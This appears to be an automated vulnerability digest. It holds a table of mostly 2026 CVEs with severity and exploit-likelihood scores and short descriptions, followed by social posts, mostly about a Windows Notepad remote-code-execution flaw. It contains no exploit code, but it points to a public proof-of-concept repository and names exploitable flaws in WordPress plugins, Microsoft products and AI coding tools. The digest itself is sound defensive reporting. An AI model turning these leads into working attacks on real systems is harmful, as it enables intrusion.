| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-1560 | 8.8 | 0.00% | 1 | 1 | 2026-02-11T09:15:51.353000 | The Custom Block Builder β Lazy Blocks plugin for WordPress is vulnerable to Rem | |
| CVE-2025-6830 | 9.8 | 0.01% | 1 | 0 | 2026-02-11T07:15:46.763000 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
| CVE-2026-1357 | 9.8 | 0.00% | 2 | 1 | 2026-02-11T06:30:48 | The Migration, Backup, Staging β WPvivid Backup & Migration plugin for WordPress | |
| CVE-2026-1235 | 0 | 0.00% | 1 | 0 | 2026-02-11T06:15:51.220000 | The WP eCommerce WordPress plugin through 3.15.1 unserializes user input via aja | |
| CVE-2025-52436 | 8.8 | 0.00% | 1 | 0 | 2026-02-10T21:52:01.987000 | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scri | |
| CVE-2026-20841 | 8.8 | 0.00% | 65 | 1 | 2026-02-10T21:51:48.077000 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-21525 | 6.2 | 0.00% | 10 | 0 | 2026-02-10T21:51:48.077000 | Null pointer dereference in Windows Remote Access Connection Manager allows an u | |
| CVE-2026-22153 | 8.1 | 0.00% | 1 | 0 | 2026-02-10T21:51:48.077000 | An Authentication Bypass by Primary Weakness vulnerability [CWE-305] vulnerabili | |
| CVE-2026-21510 | 8.8 | 0.00% | 13 | 0 | 2026-02-10T21:51:48.077000 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-26009 | 9.9 | 0.00% | 3 | 0 | 2026-02-10T21:51:48.077000 | Catalyst is a platform built for enterprise game server hosts, game communities, | |
| CVE-2026-21251 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Use after free in Windows Cluster Client Failover allows an authorized attacker | |
| CVE-2026-21259 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized atta | |
| CVE-2026-21312 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Audition versions 25.3 and earlier are affected by an out-of-bounds write vulner | |
| CVE-2026-21330 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | After Effects versions 25.6 and earlier are affected by an Access of Resource Us | |
| CVE-2026-21329 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21326 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21325 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21357 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based | |
| CVE-2026-21351 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21511 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Deserialization of untrusted data in Microsoft Office Outlook allows an unauthor | |
| CVE-2026-21523 | 8.0 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual S | |
| CVE-2026-21533 | 7.8 | 0.00% | 11 | 0 | 2026-02-10T21:51:48.077000 | Improper privilege management in Windows Remote Desktop allows an authorized att | |
| CVE-2026-25992 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/ | |
| CVE-2026-1848 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Connections received from the proxy port may not count towards total accepted co | |
| CVE-2026-21347 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow o | |
| CVE-2026-21345 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21353 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or W | |
| CVE-2026-21352 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:51:48.077000 | DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21346 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:42 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds writ | |
| CVE-2026-21344 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:42 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-1507 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T21:31:42 | The affected products are vulnerable to an uncaught exception that could allow a | |
| CVE-2026-21349 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:42 | Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds wri | |
| CVE-2026-21341 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:37 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21342 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:37 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21343 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T21:31:36 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21514 | 7.8 | 0.00% | 11 | 0 | 2026-02-10T21:31:29 | Reliance on untrusted inputs in a security decision in Microsoft Office Word all | |
| CVE-2026-21513 | 8.8 | 0.00% | 12 | 0 | 2026-02-10T21:31:29 | Protection mechanism failure in MSHTML Framework allows an unauthorized attacker | |
| CVE-2026-21519 | 7.8 | 0.00% | 11 | 0 | 2026-02-10T21:31:29 | Access of resource using incompatible type ('type confusion') in Desktop Window | |
| CVE-2026-25577 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T19:57:02 | ### Summary The `cookies` property in `emmett_core.http.wrappers.Request` does n | |
| CVE-2026-1529 | 8.1 | 0.02% | 1 | 2 | 2026-02-10T18:35:21 | A flaw was found in Keycloak. An attacker can exploit this vulnerability by modi | |
| CVE-2026-21531 | 9.8 | 0.00% | 3 | 0 | 2026-02-10T18:30:54 | Deserialization of untrusted data in Azure SDK allows an unauthorized attacker t | |
| CVE-2026-21537 | 8.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:54 | Improper control of generation of code ('code injection') in Microsoft Defender | |
| CVE-2026-25611 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T18:30:54 | A series of specifically crafted, unauthenticated messages can exhaust available | |
| CVE-2026-21328 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:53 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21260 | 7.5 | 0.00% | 2 | 0 | 2026-02-10T18:30:52 | Exposure of sensitive information to an unauthorized actor in Microsoft Office O | |
| CVE-2026-21322 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21318 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21327 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21250 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:51 | Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker | |
| CVE-2026-21323 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21320 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21324 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21246 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | Heap-based buffer overflow in Microsoft Graphics Component allows an authorized | |
| CVE-2026-21257 | 8.0 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-21256 | 8.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-21255 | 8.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | Improper access control in Windows Hyper-V allows an authorized attacker to bypa | |
| CVE-2026-21321 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | After Effects versions 25.6 and earlier are affected by an Integer Overflow or W | |
| CVE-2026-21335 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou | |
| CVE-2026-21334 | 7.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou | |
| CVE-2026-21516 | 8.8 | 0.00% | 2 | 0 | 2026-02-10T18:30:50 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-1603 | 8.6 | 0.00% | 2 | 0 | 2026-02-10T18:30:49 | An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allo | |
| CVE-2026-1602 | 6.5 | 0.00% | 2 | 0 | 2026-02-10T18:30:38 | SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote | |
| CVE-2026-24061 | 9.8 | 32.54% | 4 | 59 | template | 2026-02-10T18:30:34 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2026-0488 | 9.9 | 0.04% | 5 | 0 | 2026-02-10T15:22:54.740000 | An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could ex | |
| CVE-2026-0509 | 9.6 | 0.04% | 9 | 0 | 2026-02-10T15:22:54.740000 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, | |
| CVE-2025-6967 | 8.7 | 0.00% | 4 | 0 | 2026-02-10T15:22:54.740000 | Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technol | |
| CVE-2025-40587 | 7.6 | 0.04% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), | |
| CVE-2026-23719 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23716 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-22923 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in NX (All versions < V2512). The affected a | |
| CVE-2026-23720 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-2095 | 9.8 | 0.17% | 3 | 0 | 2026-02-10T15:22:54.740000 | Agentflow developed by Flowring has an Authentication Bypass vulnerability, allo | |
| CVE-2026-2096 | 9.8 | 0.13% | 7 | 0 | 2026-02-10T15:22:54.740000 | Agentflow developed by Flowring has a Missing Authentication vulnerability, allo | |
| CVE-2025-11547 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | AXIS Camera Station Pro contained a flaw toΒ perform a privilege escalation attac | |
| CVE-2026-0485 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T15:22:54.740000 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to send speci | |
| CVE-2026-23689 | 7.7 | 0.07% | 2 | 0 | 2026-02-10T15:22:54.740000 | Due to an uncontrolled resource consumption (Denial of Service) vulnerability, a | |
| CVE-2026-25895 | 0 | 0.19% | 1 | 0 | 2026-02-10T15:22:54.740000 | FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. A path | |
| CVE-2026-25958 | 7.7 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | Cube is a semantic layer for building data applications. From 0.27.19 to before | |
| CVE-2026-25890 | 8.1 | 0.03% | 2 | 0 | 2026-02-10T15:22:54.740000 | File Browser provides a file managing interface within a specified directory and | |
| CVE-2026-25961 | 7.5 | 0.01% | 1 | 1 | 2026-02-10T15:22:54.740000 | SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, Sumatra | |
| CVE-2026-25925 | 7.8 | 0.05% | 1 | 0 | 2026-02-10T15:22:54.740000 | PowerDocu contains a Windows GUI executable to perform technical documentations. | |
| CVE-2026-24682 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T15:04:10.197000 | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0 | |
| CVE-2026-25751 | 7.5 | 0.05% | 2 | 0 | 2026-02-10T14:33:38.680000 | FUXA is a web-based Process Visualization (SCADA/HMI/Dashboard) software. An inf | |
| CVE-2026-25656 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:34 | A vulnerability has been identified in SINEC NMS (All versions), User Management | |
| CVE-2026-2268 | 7.5 | 0.04% | 2 | 1 | 2026-02-10T12:30:34 | The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Expo | |
| CVE-2026-23717 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:33 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-25655 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:33 | A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The | |
| CVE-2026-23718 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23715 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:27 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-2094 | 8.8 | 0.08% | 4 | 0 | 2026-02-10T09:30:31 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authe | |
| CVE-2026-2097 | 8.8 | 0.21% | 6 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allo | |
| CVE-2025-11242 | 9.8 | 0.04% | 2 | 0 | 2026-02-10T09:30:27 | Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems S | |
| CVE-2026-2093 | 7.5 | 0.05% | 2 | 0 | 2026-02-10T09:30:27 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unaut | |
| CVE-2026-23687 | 8.8 | 0.05% | 8 | 0 | 2026-02-10T06:30:45 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated | |
| CVE-2026-24322 | 7.7 | 0.03% | 4 | 0 | 2026-02-10T06:30:45 | SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perf | |
| CVE-2026-0490 | 7.5 | 0.08% | 2 | 0 | 2026-02-10T06:30:39 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a sp | |
| CVE-2026-25939 | None | 0.03% | 1 | 1 | 2026-02-10T02:56:59 | ### Summary An authorization bypass vulnerability in the FUXA allows an unauthen | |
| CVE-2026-25894 | None | 0.23% | 1 | 0 | 2026-02-10T02:56:49 | ### Description An insecure default configuration in FUXA allows an unauthentica | |
| CVE-2026-25893 | None | 0.20% | 1 | 0 | 2026-02-10T02:56:44 | ### Note GitHub incorrectly stated this vulnerability is identical to CVE-2025-6 | |
| CVE-2026-25881 | 9.1 | 0.05% | 1 | 0 | 2026-02-10T02:56:34 | ### Summary A sandbox escape vulnerability allows sandboxed code to mutate host | |
| CVE-2026-25892 | 7.5 | 0.06% | 1 | 0 | 2026-02-10T02:56:05 | ### Summary Adminer v5.4.1 has a version check mechanism where `adminer.org` sen | |
| CVE-2026-1486 | 8.8 | 0.04% | 2 | 0 | 2026-02-10T02:15:52.143000 | A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-gr | |
| CVE-2025-69214 | 8.8 | 0.01% | 2 | 0 | 2026-02-10T01:16:41 | ## Summary A SQL Injection vulnerability exists in the `ajax_select.php` endpoin | |
| CVE-2025-15310 | 7.8 | 0.02% | 2 | 0 | 2026-02-10T00:30:37 | Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To | |
| CVE-2025-15319 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T00:30:37 | Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To | |
| CVE-2026-25791 | 7.5 | 0.04% | 1 | 0 | 2026-02-09T22:39:51 | ## Summary The DNS C2 listener accepts unauthenticated `TOTP` bootstrap messages | |
| CVE-2026-25639 | 7.5 | 0.01% | 2 | 0 | 2026-02-09T21:55:30.093000 | Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.13. | |
| CVE-2026-25761 | 8.8 | 0.04% | 1 | 0 | 2026-02-09T21:55:30.093000 | Super-linter is a combination of multiple linters to run as a GitHub Action or s | |
| CVE-2025-69212 | 8.8 | 0.09% | 2 | 0 | 2026-02-09T21:54:21.847000 | OpenSTAManager is an open source management software for technical assistance an | |
| CVE-2026-1731 | 0 | 0.44% | 3 | 2 | template | 2026-02-09T16:08:55.263000 | BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote |
| CVE-2026-25847 | 8.2 | 0.00% | 1 | 0 | 2026-02-09T16:08:35.290000 | In JetBrains PyCharm before 2025.3.2 a DOM-based XSS on Jupyter viewer page was | |
| CVE-2026-2234 | 9.1 | 0.05% | 3 | 0 | 2026-02-09T16:08:35.290000 | C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing | |
| CVE-2026-22906 | 9.8 | 0.07% | 1 | 0 | 2026-02-09T16:08:35.290000 | User credentials are stored using AESβECB encryption with a hardcoded key. An un | |
| CVE-2026-22904 | 9.8 | 0.12% | 1 | 0 | 2026-02-09T16:08:35.290000 | Improper length handling when parsing multiple cookie fields (including TRACKID) | |
| CVE-2025-59023 | 8.2 | 0.01% | 1 | 0 | 2026-02-09T15:30:37 | Crafted delegations or IP fragments can poison cached delegations in Recursor. | |
| CVE-2025-10465 | 8.8 | 0.02% | 1 | 0 | 2026-02-09T15:30:37 | Unrestricted Upload of File with Dangerous Type vulnerability in Birtech Informa | |
| CVE-2026-25722 | 9.1 | 0.09% | 1 | 0 | 2026-02-09T14:51:42.203000 | Claude Code is an agentic coding tool. Prior to version 2.0.57, Claude Code fail | |
| CVE-2026-25724 | 7.5 | 0.04% | 1 | 0 | 2026-02-09T14:47:41.783000 | Claude Code is an agentic coding tool. Prior to version 2.1.7, Claude Code faile | |
| CVE-2026-25848 | 9.1 | 0.00% | 1 | 0 | 2026-02-09T12:30:30 | In JetBrains Hub before 2025.3.119807 authentication bypass allowing administrat | |
| CVE-2025-7799 | 8.6 | 0.04% | 1 | 0 | 2026-02-09T09:30:28 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site | |
| CVE-2026-22903 | 9.8 | 0.43% | 1 | 0 | 2026-02-09T09:30:28 | An unauthenticated remote attacker can send a crafted HTTP request containing an | |
| CVE-2026-2236 | 7.5 | 0.05% | 3 | 0 | 2026-02-09T09:30:27 | C&Cm@il developed by HGiga has a SQL Injection vulnerability, allowing unauthen | |
| CVE-2026-22905 | 7.5 | 0.10% | 2 | 0 | 2026-02-09T09:30:27 | An unauthenticated remote attacker can bypass authentication by exploiting insuf | |
| CVE-2026-25752 | None | 0.05% | 2 | 0 | 2026-02-06T21:42:47 | ### Summary **Description** An authorization bypass vulnerability in FUXA allows | |
| CVE-2026-25725 | None | 0.04% | 1 | 0 | 2026-02-06T19:14:34 | Claude Code's bubblewrap sandboxing mechanism failed to properly protect the .cl | |
| CVE-2026-2103 | 7.1 | 0.01% | 2 | 0 | 2026-02-06T18:30:43 | Infor SyteLine ERP uses hard-coded static cryptographic keys to encrypt stored c | |
| CVE-2026-0227 | 7.5 | 0.06% | 2 | 2 | 2026-02-06T17:37:28.723000 | A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated | |
| CVE-2026-24423 | 9.8 | 9.22% | 2 | 1 | 2026-02-06T16:45:15.323000 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated | |
| CVE-2026-21643 | 9.8 | 0.13% | 6 | 1 | 2026-02-06T09:30:35 | An improper neutralization of special elements used in an sql command ('sql inje | |
| CVE-2025-24054 | 6.5 | 11.25% | 1 | 9 | 2026-02-05T13:01:23.843000 | External control of file name or path in Windows NTLM allows an unauthorized att | |
| CVE-2026-25049 | None | 0.03% | 3 | 1 | 2026-02-04T21:09:38 | ### Impact Additional exploits in the expression evaluation of n8n have been id | |
| CVE-2026-1340 | 9.8 | 0.18% | 2 | 1 | 2026-02-04T16:34:21.763000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2025-40551 | 9.8 | 54.99% | 1 | 0 | template | 2026-02-04T02:00:02.030000 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri |
| CVE-2025-15467 | 9.8 | 0.66% | 2 | 4 | 2026-02-02T18:38:55.073000 | Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE | |
| CVE-2026-1281 | 9.8 | 16.41% | 2 | 1 | 2026-01-30T13:28:18.610000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2015-10145 | 8.8 | 0.10% | 2 | 0 | 2026-01-29T18:32:39 | Gargoyle router management utility versions 1.5.x contain an authenticated OS co | |
| CVE-2026-23760 | 9.8 | 55.52% | 1 | 2 | template | 2026-01-27T16:16:55.327000 | SmarterTools SmarterMail versions prior to build 9511 contain an authentication |
| CVE-2026-24476 | 0 | 0.03% | 2 | 0 | 2026-01-27T14:59:34.073000 | Shaarli is a personal bookmarking service. Prior to version 0.16.0, crafting a m | |
| CVE-2026-20817 | 7.8 | 0.06% | 1 | 0 | 2026-01-13T18:31:17 | Improper handling of insufficient permissions or privileges in Windows Error Rep | |
| CVE-2023-4911 | 7.8 | 73.04% | 1 | 17 | template | 2026-01-08T16:28:27.603000 | A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi |
| CVE-2024-2511 | 5.9 | 3.67% | 1 | 0 | 2025-11-04T00:31:52 | Issue summary: Some non-default TLS server configurations can cause unbounded me | |
| CVE-2025-54257 | 7.8 | 0.03% | 1 | 0 | 2025-11-03T19:16:09.190000 | Acrobat Reader versions 24.001.30254, 20.005.30774, 25.001.20672 and earlier are | |
| CVE-2018-0802 | 7.8 | 94.07% | 2 | 7 | 2025-10-28T14:14:01.610000 | Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Offic | |
| CVE-2025-53770 | 9.8 | 89.20% | 4 | 46 | template | 2025-10-22T00:34:26 | Deserialization of untrusted data in on-premises Microsoft SharePoint Server all |
| CVE-2025-60787 | 7.2 | 40.20% | 1 | 1 | 2025-10-10T16:22:30.703000 | MotionEye v0.43.1b4 and before is vulnerable to OS Command Injection in configur | |
| CVE-2025-26399 | 9.8 | 12.86% | 5 | 1 | 2025-09-23T06:30:33 | SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxP | |
| CVE-2025-27158 | 7.8 | 0.04% | 1 | 0 | 2025-04-28T16:48:57.070000 | Acrobat Reader versions 24.001.30225, 20.005.30748, 25.001.20428 and earlier are | |
| CVE-2025-3573 | 6.1 | 0.25% | 2 | 0 | 2025-04-15T14:24:22 | Versions of the package jquery-validation before 1.20.0 are vulnerable to Cross- | |
| CVE-2026-25993 | 0 | 0.00% | 1 | 0 | N/A | ||
| CVE-2026-25947 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-25506 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-24684 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2026-25646 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-25931 | 0 | 0.01% | 2 | 0 | N/A | ||
| CVE-2026-25808 | 0 | 0.03% | 2 | 0 | N/A | ||
| CVE-2026-25807 | 0 | 0.11% | 2 | 1 | N/A | ||
| CVE-2026-23876 | 0 | 0.06% | 1 | 0 | N/A | ||
| CVE-2026-25880 | 0 | 0.01% | 1 | 0 | N/A | ||
| CVE-2026-25231 | 0 | 0.06% | 2 | 0 | N/A | ||
| CVE-2026-25057 | 0 | 0.04% | 1 | 0 | N/A | ||
| CVE-2026-25740 | 0 | 0.01% | 1 | 0 | N/A |
updated 2026-02-11T09:15:51.353000
1 posts
1 repos
https://github.com/Z3YR0xX/CVE-2026-1560-Authenticated-Remote-Code-Execution-in-Lazy-Blocks-4.2.0
β οΈ HIGH severity: CVE-2026-1560 in Lazy Blocks (WordPress, β€4.2.0) lets Contributor+ users run arbitrary code via improper code generation (CWE-94). No public exploits yet β restrict roles and monitor activity! https://radar.offseq.com/threat/cve-2026-1560-cwe-94-improper-control-of-generatio-655d2091 #OffSeq #WordPress #RCE #Vuln
##updated 2026-02-11T07:15:46.763000
1 posts
π΄ CVE-2025-6830 - Critical (9.8)
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xpoda TΓΌrkiye Information Technology Inc. Xpoda Studio allows SQL Injection.This issue affects Xpoda Studio: through 09022026. NOTE: The vendor...
π https://www.thehackerwire.com/vulnerability/CVE-2025-6830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T06:30:48
2 posts
1 repos
π¨ CRITICAL: CVE-2026-1357 impacts WPvivid Backup & Migration (all versions). Unauthenticated file upload via directory traversal enables RCE. Disable plugin or restrict access immediately! https://radar.offseq.com/threat/cve-2026-1357-cwe-434-unrestricted-upload-of-file--8f35918d #OffSeq #WordPress #Infosec #CVE20261357
##A critical arbitrary file upload vulnerability (CVE-2026-1357, CVSS 9.8) was discovered in the WPvivid Backup & Migration plugin, which is installed on over 800,000 WordPress sites.
The flaw allows unauthenticated attackers to upload arbitrary files, potentially achieving remote code execution and full site takeover.
Update to version 0.9.124. Wordfence Premium users received firewall protection on January 22.
##updated 2026-02-11T06:15:51.220000
1 posts
π¨ CVE-2026-1235: CRITICAL deserialization flaw in WP eCommerce (β€3.15.1) allows unauthenticated PHP object injection via AJAX. No patch yet. Disable vulnerable AJAX actions & audit plugins. High risk for EU e-commerce sites. https://radar.offseq.com/threat/cve-2026-1235-cwe-502-deserialization-of-untrusted-67de3834 #OffSeq #WordPress #Security
##updated 2026-02-10T21:52:01.987000
1 posts
RE: https://infosec.exchange/@ozu/116041085922526875
Another another vuln. CVE-2025-52436
##updated 2026-02-10T21:51:48.077000
65 posts
1 repos
Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Notepad.exe RCE Vulnerability 8.8
Are you shitting me?
Windows Notepad App Remote Code Execution Vulnerability: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: http://news.ycombinator.com/item?id=46971516
##Notepad... NOTEPAD!
CVE Record: CVE-2026-20841
##What the.. how?
Notepad was the simplest application on windows. What have they done to it?
##Really looking forward to the analysis of this remote code execution vulnerability in [checks notes] Windows Notepad
##Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
Microsoft hat NOTEPAD.EXE jetzt erfolgreich kaputt gespielt.
##Notepad RCE? https://cvefeed.io/vuln/detail/CVE-2026-20841
##lmao, it's 2026 and we have spaceships in the heliosphere, high-resolution images of Pluto and a permanent robotic presence, in orbit and on ground, on Mars.
plus remote code execution in fucking Notepad.
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##age-verification concerns.
- Windows security flaws: multiple 2026 CVEs (Notepad RCE CVE-2026-20841; MSHTML; CVE-2026-21510/13/19/25/33) and ongoing Patch Tuesday updates.
- AI and work: productivity boosts but rising cognitive load and burnout; AI adoption altering job markets and roles.
- Open/indie web and OSS: growing use of Pixelfed, Matrix, Zulip; open-source Discord alternatives (Stoat chat); broader Fediverse/indie-web movement.
- Space/AI funding and policy: [2/3]
Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Comments: https://news.ycombinator.com/item?id=46971516
lol
Windows Notepad App Remote Code Execution Vulnerability
##π Latest Top Story on #HackerNews: Windows Notepad App Remote Code Execution Vulnerability
π Original Story: https://www.cve.org/CVERecord?id=CVE-2026-20841
π€ Author: riffraff
β Score: 63
π¬ Number of Comments: 12
π Posted At: 2026-02-11 06:15:33 UTC
π URL: https://news.ycombinator.com/item?id=46971516
#news #hackernewsbot #bot #hackernews
Windows Notepad App Remote Code Execution Vulnerability
Link: https://www.cve.org/CVERecord?id=CVE-2026-20841
Discussion: https://news.ycombinator.com/item?id=46971516
#Windows #sΓ©curitΓ©
Oh misΓ¨re, y'a mΓͺme des failles RCE dans le Notepad de Windows ???
https://www.cve.org/CVERecord?id=CVE-2026-20841
